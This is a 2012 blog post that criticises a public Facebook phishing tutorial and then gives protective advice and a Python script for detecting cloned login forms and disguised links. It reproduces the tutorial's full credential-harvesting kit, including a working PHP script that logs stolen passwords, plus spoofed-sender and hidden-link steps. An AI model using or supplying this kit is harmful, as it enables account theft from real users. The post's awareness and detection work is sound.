Sunday 18 March 2012

Facebook Phishing

Recently I came across an article entitled "How to Hack Facebook Account using phishing web page?". The article took me by surprise; I never thought such instructions would be posted for the public to see and follow. Before I go through the step-by-step process the article gives for hacking into a Facebook account with a phishing page, I would like to explain what phishing is. Phishing a web page means creating a web page that looks like the original website. With such a page an attacker makes users believe they are on the real site, so that they enter their ID and password there.

Step 1:
Go to Facebook.com
Right click on the white space of the front page.  Select "View Page source".

Copy the code to Notepad. 

Step 2: 
Now search (press Ctrl+F) for "action=" in that code.
You will find a line like this (the tutorial's screenshot is not reproduced here):
The circled value of the form's action attribute is changed to "next.php", so that whatever the visitor types is submitted to the attacker's script instead of to Facebook. The tutorial then says to change the method to "get" instead of "post", "or else it will not work". Note, however, that the next.php script in Step 3 reads its fields from $_POST; with a GET form that loop would see nothing, so for the script as written the form must keep method="post". Save the document as index.html.

Step 3:
Now we need to create "next.php", the script that stores the submitted password. To do this, open Notepad and type the following code (the tutorial's script, with comments added):
<?php
// Redirect the visitor straight to the real login page so nothing looks wrong.
header("Location: http://www.Facebook.com/login.php");
// Append every submitted field (e.g. email=..., pass=...) to the log file.
$handle = fopen("pswrds.txt", "a");
foreach($_POST as $variable => $value) {
    fwrite($handle, $variable);
    fwrite($handle, "=");
    fwrite($handle, $value);
    fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

Step 4: 
Open Notepad and save an empty file as "pswrds.txt".
Then upload the three files (index.html, next.php, pswrds.txt) to any free subdomain web-hosting site that supports PHP. The tutorial suggests 110mb.com, spam.com, justfree.com or 007sites.com. The web server must be able to write to pswrds.txt, and because the file sits in the web root, anyone who guesses its name can read everything the page has harvested.
Step 5: 
Create an email account whose address looks as though it belongs to Facebook, for example facebook@hotmail.com or facebook_welcome@hotmail.com.

Step 6: 
Copy a genuine Facebook invitation email and paste it into a new message. When someone adds you as a friend on Facebook, the notification mail contains the link http://www.facebook.com/n/?reqs.php. Remove the hyperlink from that text, then select (mark) the text and press the "Add hyperlink" button to create a link with the same visible text that points to your site instead. In the tutorial's words:

"Add the hyperlink button in the red circle and your phisher page URL in the hyperlink bar that appears after clicking the button, and click Add. The hyperlink should still display http://www.facebook.com/n/?reqs.php but this leads to your phisher page." (http://www.breakthesecurity.com/2010/11/how-to-hack-facebook-account-using.html)


The title of the page reads "Ethical Hacking Tutorials". Is this ethical? The Internet, as a medium, is shaping the values and outlook of children, and its vast array of information has become a source of trouble for them. The knowledge to be acquired is marvellous and unique, but it has to be used in the right way. The Internet also serves as a positive learning and teaching tool, and it offers ways to prevent and protect against Facebook phishing attacks:

1) Follow the Sophos blog. Sophos reports on the latest Facebook phishing scams in its blog, Naked Security, one of the best sources today on Facebook scams. Its stories and articles raise public awareness of the different Facebook phishing scams people have run into.

2) BitDefender Safego. Safego is a Facebook application developed by BitDefender that is designed to keep users aware of, and protected from, scams on Facebook. It scans the user's profile for suspicious links and can optionally post a warning on the user's wall automatically when a threat is detected.

3) Facebook Security. Another way of staying safe on Facebook comes from the source itself: the Facebook Security page, which is constantly updated with advice on protecting your account.

4) Look for the signs. Beyond the technical measures, the best protection for a Facebook account is alertness. Check who has posted on your wall and ask why they would share something beginning with "OMG you won't believe this!". If you receive an email that claims to be from Facebook, examine the address it came from: genuine Facebook notifications come from facebookmail.com, whereas the tutorial above relies on a look-alike address at a free mail provider. Bear in mind that a From address can also be forged, so a facebookmail.com sender is not proof by itself; the tutorial's other tell is link text that reads facebook.com while the underlying link points elsewhere, so hover over a link and compare the two before clicking. If you suspect your account has been phished, change your password first; you can also tighten your privacy settings on Facebook.
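As an added example that is not part of the original post or of the tutorial it quotes, the following Python script turns the two tells the tutorial depends on into checks. Steps 2 and 3 rewrite the login form's action so that credentials are submitted to an off-site next.php, and Steps 5 and 6 send a notification from a look-alike address whose link text reads facebook.com while the href points at the phishing page. The allow-listed hostnames, the attacker.example host, and the sample page and email are assumptions constructed for this example.

```python
# Added example, not code from the original post or from the breakthesecurity tutorial.
from email.utils import parseaddr
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

# Assumed allow-list: hosts a genuine Facebook login form or notification link may use.
LEGIT_HOSTS = ("facebook.com", "facebookmail.com")
NOTIFICATION_DOMAIN = "facebookmail.com"   # sender domain named in item 4 above


def host_of(url):
    """Hostname of a URL, lower-cased; '' if it has none."""
    if "://" not in url:
        url = "http://" + url          # lets bare 'www.facebook.com/...' link text parse
    return (urlparse(url).hostname or "").lower()


def is_legit_host(host):
    return any(host == h or host.endswith("." + h) for h in LEGIT_HOSTS)


class _Collector(HTMLParser):
    """Collects every <form action/method> and every <a href> with its visible text."""
    def __init__(self):
        super().__init__()
        self.forms, self.links = [], []
        self._href, self._text = None, []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.forms.append((a.get("action") or "", (a.get("method") or "get").lower()))
        elif tag == "a":
            self._href, self._text = a.get("href") or "", []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def check_page(html, page_url):
    """Tell 1 (Steps 2-3): a login form whose action submits credentials off-site."""
    p = _Collector()
    p.feed(html)
    findings = []
    for action, method in p.forms:
        target = urljoin(page_url, action)      # 'next.php' resolves against the page URL
        if not is_legit_host(host_of(target)):
            findings.append(f"login form submits ({method}) to {target}")
    return findings


def check_email(sender, html):
    """Tell 2 (Steps 5-6): sender outside facebookmail.com, or link text naming a
    facebook.com URL while the href goes somewhere else."""
    findings = []
    domain = parseaddr(sender)[1].rpartition("@")[2].lower()
    if domain != NOTIFICATION_DOMAIN:
        findings.append(f"sender domain {domain!r} is not {NOTIFICATION_DOMAIN}")
    p = _Collector()
    p.feed(html)
    for href, text in p.links:
        looks_like_url = "." in text and " " not in text
        if looks_like_url and is_legit_host(host_of(text)) and not is_legit_host(host_of(href)):
            findings.append(f"link displays {text} but goes to {href}")
    return findings


# Constructed samples mirroring the tutorial's kit (hostnames are made up).
PHISH_PAGE_URL = "http://attacker.example/fb/index.html"
PHISH_PAGE = '<form method="post" action="next.php"><input name="email"><input name="pass"></form>'
REAL_PAGE = '<form method="post" action="https://www.facebook.com/login.php"><input name="email"></form>'
PHISH_MAIL = ("Facebook <facebook_welcome@hotmail.com>",
              '<p>Someone added you as a friend.</p>'
              '<a href="http://attacker.example/fb/index.html">http://www.facebook.com/n/?reqs.php</a>')
REAL_MAIL = ("Facebook <notification@facebookmail.com>",
             '<a href="http://www.facebook.com/n/?reqs.php">http://www.facebook.com/n/?reqs.php</a>')

if __name__ == "__main__":
    for f in check_page(PHISH_PAGE, PHISH_PAGE_URL) + check_email(*PHISH_MAIL):
        print("FLAG:", f)
    print("clean page:", check_page(REAL_PAGE, "https://www.facebook.com/"))
    print("clean mail:", check_email(*REAL_MAIL))
```

The form check resolves a relative action such as next.php against the page's own URL, which is exactly how the browser would resolve it, so a cloned page hosted on a free subdomain is caught even though its action does not name a host. The link check only fires when the visible text is itself a facebook.com URL, which is the deception Step 6 sets up; a link whose text is ordinary words is left to the sender check.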